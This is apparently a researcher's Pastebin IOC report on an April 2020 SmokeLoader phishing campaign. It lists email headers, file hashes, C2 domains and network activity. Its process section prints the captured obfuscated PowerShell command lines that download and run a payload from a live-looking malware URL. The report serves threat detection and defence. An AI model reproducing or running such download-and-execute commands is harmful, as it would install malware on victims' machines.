API tools faq
paste
Advertisement
VRad

#smokeloader_070420

VRad
Apr 9th, 2020
8,019
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.23 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #smokeloader #LZH #WSH #vmdetect
  2.  
  3. https://pastebin.com/EagNZxKf
  4.  
  5. previous_contact:
  6. https://pastebin.com/QpG70u8T
  7. https://pastebin.com/BJzcXqkK
  8. https://pastebin.com/kBW7nkZ5
  9. https://pastebin.com/Z7zq0YkW
  10. https://pastebin.com/b8PkhMyN
  11. https://pastebin.com/hkskwKvc
  12. https://pastebin.com/JmthzrL4
  13. https://pastebin.com/1scwT0f8
  14. https://pastebin.com/MP3kCSSh
  15.  
  16. FAQ:
  17. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  18. https://research.checkpoint.com/2019-resurgence-of-smokeloader/
  19.  
  20. attack_vector
  21. --------------
  22. email attach .RAR (LHa/LZH) > JS > WSH > PowerShell > GET 1URL > exe
  23.  
  24. email_headers
  25. --------------
  26. Received: from hosting.wildpark.net (hosting.wildpark.net [217.77.208.228])
  27. Received: from [127.0.0.1] (unknown [148.251.234.93])
  28. by hosting.wildpark.net (Postfix) with ESMTPA id 7C920200037A
  29. Reply-To: [email protected]
  30. From: [email protected]
  31. Subject: Re: Задержка по оплате
  32. Message-Id: <[email protected]>
  33. Date: Tue, 7 Apr 2020 05:10:22 +0300
  34. X-Mailer: iPhone Mail (13E238)
  35. X-FEAS-CLIENT-IP: 217.77.208.228
  36. Return-Path: [email protected]
  37.  
  38. files
  39. --------------
  40. SHA-256 9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e
  41. File name План від 05.04.2020р.rar [ LHa (2.x)/LHark archive data [lh7] - header level 0 ]
  42. File size 6.69 KB (6852 bytes)
  43.  
  44. SHA-256 cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854
  45. File name pax_05.04.2020à..js [ JavaScript ]
  46. File size 19.80 KB (20278 bytes)
  47.  
  48. SHA-256 4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b
  49. File name poppy.exe [PE32 executable for MS Windows (GUI) Intel 80386 32-bit]
  50. File size 147.00 KB (150528 bytes)
  51.  
  52. SHA-256 8d16d5caad71aaaaa1479f8477d2928b66581c79932a49a21edf93db2803ab9c
  53. File name 9419.tmp (ntdll.dll) [clean, droped to %temp%, Microsoft Visual C++ vx.x DLL ]
  54. File size 1.23 MB (1292192 bytes)
  55.  
  56. activity
  57. **************
  58. PL_SCR http://scproducts7.ru/availableupdatemanager/poppy.exe
  59.  
  60. C2 amfibiyapolyakova{.} com - thnx for @JAMESWT_MHT
  61. amfibiyapolyakova{.} com - sinkholed (CyS Centrum)
  62. siciliyaopartion{.} ru - sinkholed (CyS Centrum)
  63. opetileon{.} ru - sinkholed (CyS Centrum)
  64. crocopexpire{.} ug - sinkholed (CyS Centrum)
  65. yamaha{.} ug - sinkholed (CyS Centrum)
  66. informatioshopname{.} ru - thnx for CyS Centrum
  67.  
  68. netwrk
  69. --------------
  70. [http]
  71. 8.208.91.58 scproducts7.ru GET /availableupdatemanager/poppy.exe HTTP/1.1 Google Chrome
  72. (!) !This program cannot be run in DOS mode.
  73. 185.14.31.88 amfibiyapolyakova.com POST / HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/5.0
  74.  
  75. [ssl]
  76. 204.79.197.200 www.bing.com Client Hello
  77.  
  78. comp
  79. --------------
  80. powershell.exe 8.208.91.58 scproducts7.ru
  81. explorer.exe 185.14.31.88 amfibiyapolyakova.com
  82.  
  83. proc
  84. --------------
  85. C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_05.04.2020à..js
  86.  
  87. C:\Windows\System32\cmd.exe" /c iwbDyExnfhFHuWV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','%temp%WHk58.exe'); & %temp%WHk58.exe & CXorbhFlHAGsKcP
  88.  
  89. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://scproducts7.ru/availableupdatemanager/poppy.exe','C:\tmpWHk58.exe');
  90.  
  91. C:\tmpWHk58.exe
  92.  
  93. persist
  94. --------------
  95. n/a
  96.  
  97. drop
  98. --------------
  99. C:\tmpWHk58.exe
  100. %temp%\9419.tmp
  101. %temp%\se3mut05.g01.ps1
  102. %temp%\nsfka0oj.3qd.psm1
  103. C:\Users\operator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  104.  
  105. # # #
  106. https://www.virustotal.com/gui/file/9ace214924c5edd5a0f2b81a6798a264d92f79f0b30479b821ba3af9a24a422e/details
  107. https://www.virustotal.com/gui/file/cf99abc48e39374b48d9729f7efdf4d3aeaf93ce9011708c8cf6a2f939b99854/details
  108. https://www.virustotal.com/gui/file/4a77f5a9c0c331f53178518cab3e24b4bdb2c230c50ac16d5d917f73ebe8e51b/details
  109. https://analyze.intezer.com/#/analyses/2ad8aa89-9449-4ea1-80d3-e2513c1ff7f6
  110.  
  111. VR
  112.  
  113. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!